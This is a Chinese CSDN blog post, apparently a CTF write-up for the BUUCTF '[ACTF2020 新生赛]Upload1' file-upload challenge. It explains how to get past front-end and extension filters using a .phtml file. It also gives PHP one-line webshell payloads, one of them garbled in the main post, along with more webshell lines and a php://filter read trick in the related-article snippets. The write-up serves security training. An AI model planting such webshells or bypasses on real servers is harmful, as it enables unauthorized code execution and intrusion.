web buuctf [ACTF2020 新生赛]Upload1

最新推荐文章于 2024-04-24 20:40:39 发布
最新推荐文章于 2024-04-24 20:40:39 发布
阅读量310 收藏
点赞数
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44214568/article/details/120118782
版权

其实这一题是我在极客大挑战upload后做的,所以直接上传了之前的一句话木马,用蚁剑连了之后,就直接做出来了。我重新做了一下这道题,解题目流程:

1.随便上传了一个txt文档,提示上传jpg、png格式的,弹出的是个脚本,可能前端有过滤,

f12看前端代码

删掉前端代码

上传成功了,这样前端可以绕过了

 

2.上传一句话木马(用能执行php代码的格式)

提示:

 说明后端也有过滤,这个我尝试了一下格式:php4

 也不行,试试phtml

 payload:

<?php @eval_POST[shell]; phpinfo();?>

3.用蚁剑连接,从根目录就能看到flag(具体连接见上一篇博客)

 

 

半杯雨水敬过客
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ACTF2020 新生]Upload1解题思路
xiyuanyue的博客
10-10 278
3、一次尝试其他类型的文件,其中.htaccess .ini .phtml 等文件都可以上传。1、通过源码分析前端允许.png .jpg .gif文件上传,文件上传后重置了文件名称。4、上传一句话木马,使用antSword连接,虚拟终端 ,返回到根目录获取flag。2、抓取接口修改文件后缀未.php提示 badfile,代码中对文件后缀做了校验。php 服务器可以把其他后缀的文件解析后可作为代码运行。
文件上传 [ACTF2020 新生]Upload1
m0_75178803的博客
11-12 589
上传htaccess文件的时候,因为有前端校验,我们把前端校验删了以后发现能够成功上传htaccess文件,但是接着上传jpg格式的一句话木马时却连不上。.phtml文件告诉网络服务器,这些文件是由服务器生成的带有动态内容的html文件,就像浏览器中的.php文件表现一样。最开始我想到的做法是先上传htaccess文件,bp修改文件头,上传成功后然后再上传以jpg为文件后缀的一句话木马。发现网站前端有白名单限制,只能上传含有jpg,png,gif的后缀文件。打开题目,发现是一道文件上传题目。
[ACTF2020 新生]Upload--BUUCTF
最新发布
XiaoYeZhu_1314的博客
04-24 263
得到:Upload Success!第二步:使用bp抓上传jpg文件的包,在修改文件后缀名为phtml。第一步:上传php文件,他提示,只能上传jpg、png、gif。第四步:拼接访问,连接蚁剑,找到flag。第三步:进行放过,在访问浏览器。
(文件上传upload) [极客挑战 2019]Upload1 和 [ACTF2020新生]Upload1
一醉一休的博客
02-23 8741
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。 由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致用户可以越过其本身权限向服务器上传可执行的动态脚本文件。 一、[极客挑战 2019]Upload1 ...
BUUCTF-[ACTF2020 新生]Upload1
Monica的博客
09-22 1581
目录 题目: 分析: 题目: 打开之后啥也没有,鼠标放在中间的灯上面发现有文件上传的地方,猜测是一个文件上传漏洞 分析: 先随便上传一个文件,发现提示 并且bp抓包并没有抓到包,说明为前端检测过滤。 那就上传jpg,png,gif这三种类型的文件,然后bp抓包在修改后缀为php。 先上传一个jpg文件,内容为<?php phpinfo();?>。 发现后端还是进行了检查过滤 那就试试其他几种后缀: 绕过后缀的有文件格式有php,php3,php...
[ACTF2020 新生]Upload 1
m0_73734159的博客
11-07 391
在抓包数据里面进行修改文件后缀将flag.jpg修改为flag.phtml。记住原文件不要动只在数据包里面修改,不然的话是绕不过的!区别在于本题需要在抓包数据里面改文件后缀,在外部改是不行的。这道题和上一道大差不差、大同小异、这里不再赘述。Repeater重放Send。在/根目录下找到flag文件。文件命名为flag.jpg。此时已经可以进行蚁剑连接了。这两道题可以对比进行研究。复制URL进行蚁剑连接。
潞安矿区高河井田构造样式探讨
06-24
高河井田位于沁水块坳东南部,主要含煤地层包括二叠系下统山西组和石炭系上统太原组,构造要素走向总体为近SN—NNE向。通过对高河井田构造的系统分析,划分了两大类三亚类主要构造样式,并结合实例分析了各种构造样式对...
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
09-24
学习matlab的基本使用例子,有矩阵运算,绘制曲线图等
Jeopardy-Writeups:SniperOJ的CTF挑战
05-18
SniperOJ的挑战文章和源代码描述平台...─ pwn│ ├── pwn100-bof-x86-64│ ├── pwn100-shellcode-x86-64│ ├── pwn150-static-x86-64│ ├── pwn200-actf-run-circles│ ├── pwn200-shorter-shellc
NTFS文件系统分析
09-19
NTFS文件系统分析,比较详细的介绍,各个元文件的定义,偏移
光立方888 573 2803程序
06-14
光立方888 573 2803程序,有详细的原理图
ACTF2020新生Upload 1
Light_inthe_eyes的博客
11-04 171
是一个文件上传,随便上传一个,提示要上传照片格式,那么就上传一句话木马.jpg: <?php @eval($_POST['123']); ?> 抓包修改后缀名,经过多次尝试,.phtml成功连接蚁剑: 找到flag: 顺便看看过滤了哪些后缀: 总结: .phtml的一句话木马上传绕过限制 ...
ACTF2020新生-upload1
m0_73303597的博客
12-11 380
自用
buuctf[ACTF2020 新生]Upload 1
qq_53175607的博客
12-06 601
1.打开题目,先上传一句话木马试试。 <script language='php'>@eval($_POST['love']);</script> 按照传统方法,现将一句话木马利用windows文件后缀识别的特点,将后缀名改为图片后缀名。 上传,抓包改包! 改为phtml后缀 上传成功,构架url用蚁剑连接。 http://5081ca11-6534-49bf-8f3b-94c45fc9946e.node4.buuoj.cn:81/uplo4d/38a64fe21fe9be
buuctf-web-[ACTF2020 新生]Upload1
mlws1900的博客
08-03 280
或者查看源代码,可以找到上传的地方。随机点一下,发现了可以点亮这个灯。可以上传jpg,但是没法解析。抓包修改后缀名phtml上传。咋flag都喜欢放根目录。
[极客挑战 2019]Upload 1(文件上传)
热门推荐
weixin_45253573的博客
12-08 1万+
打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 前几个php格式的一句话都被b了,比如php3 将文件格式改到phtml可以了,但带<?的一句话
CTF秀 upload1
天天学安全专属博客
11-18 341
攻防世界 upload1
buuctf ACTF2020 Include
09-16
根据提供的引用内容,buuctf ACTF2020的Include功能可能存在文件包含漏洞。通过将URL中的参数修改为"?file=php://filter/convert.base64-encode/resource=flag.php",可以尝试读取flag.php文件并将其内容以Base64...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值